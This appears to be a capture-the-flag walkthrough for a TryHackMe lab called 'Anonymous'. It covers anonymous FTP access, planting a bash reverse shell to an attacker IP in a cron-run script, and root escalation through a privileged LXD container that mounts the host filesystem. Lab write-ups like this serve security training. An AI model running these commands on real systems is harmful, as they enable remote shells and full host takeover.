Anonymous THM

IP

10.10.133.171

Nmap inital scan

sudo nmap -sV -sC -A -oA nmap_inital 10.10.133.171

Nmap full scan

• always a good idea to run a full scan after our initial scan

sudo nmap -p- -oA nmap_full 10.10.133.171

• Nothing interesting

Ports open

21:FTP

• We can tell from our Nmap scan that anonymous login is enabled

22:SSH

139:SMB

445:SMB

FTP

let's use anonymous to login into the FTP server.

ftp anonymous@10.10.133.171

Looking through ftp we find a directory called scripts, and within scripts we can see.

Let's download the files

get clean.sh
get removed_files.log
get to_do.txt

viewing the to_do.txt we see.

• couldn't agree more

When we look at clean.sh.

Interesting, wonder if this script is part of a cron job. If we look through removed_files.log.

we can see clean.sh has been ran several times, let's check out the time of the creation of the log

we can see the log file is being updated every minute, most likely a cron job running the clean.sh script. Let's see if we can replace the clean.sh with a bash reverse shell.

reverse shell

bash -i >& /dev/tcp/10.14.45.1/9001 0>&1

we can add this one-liner to the end of the clean.sh script

Let's start a Netcat listener

nc -lvnp 9001

Now let's put this on the FTP server

ftp anonymous@10.10.133.171
cd scripts
put clean.sh

Now we can wait for the scripts to execute and we should get a shell on the system.

Privilege escalation via namelessonone

Let's stabilize our shell

python3 -c "import pty;pty.spawn('/bin/bash')"

in our new shell let's check our id and groups we are part off

we can see we are part of the adm group meaning, adm members usually have permission to read log files located inside /var/log we should first look there

• didn't find anything interesting

Let's see if we can find any suid files

find / -type f -perm -04000 -ls 2>/dev/null

• Nothing interesting

Lets check the kernel version and see if there if it is vulnerable

cat /proc/version

• nothing to interesting

if we look back into what groups we are part of we can notice we are part of the lxd group

we can refer to the following article https://steflan-security.com/linux-privilege-escalation-exploiting-the-lxc-lxd-groups/

But essentially, LXD relates to the Linux Container Deamon service. As we are part of the group we can use the service and we can abuse it. First, we need a few things

we need to clone the following repo onto our local machine

git clone https://github.com/saghul/lxd-alpine-builder
cd lxd-alpine-builder
sudo ./build-alpine

from here we should have the following files

What did we do?

• well any easy way we could go about this is to build an Alpine image (a lightweight Linux distribution) then once we transfer the compressed file over to our target system, we can start the container using the security.privileged=true flag, forcing the container to interact as root with the host file system

Now we need to transfer the compressed file to the target machine

• lets start a python3 server

python3 -m http.server 8080

• from our target machine we can use wget to download the file

wget http://10.14.45.1:8080/alpine-v3.13-x86_64-20210218_0139.tar.gz

Next on our target machine we need to import the image using the lxc command line tool, its important to do it within our home directory

lxc image import ./alpine-v3.13-x86_64-20210218_0139.tar.gz --alias myimage

Before we actually use the image it should be initialized and its storage pool should be configured, just pick default for all options

lxd init

now the image can then be run using the security.privileged flag set to true, which will grant the current user root access to the container

lxc init myimage mycontainer -c security.privileged=true

Now we need to mount the root folder of the container, under /mnt/root

lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true

Now we can start the container and use the "exec" lxc command to execute a /bin/sh shell

lxc start mycontainer
lxc exec mycontainer /bin/sh

we are now root!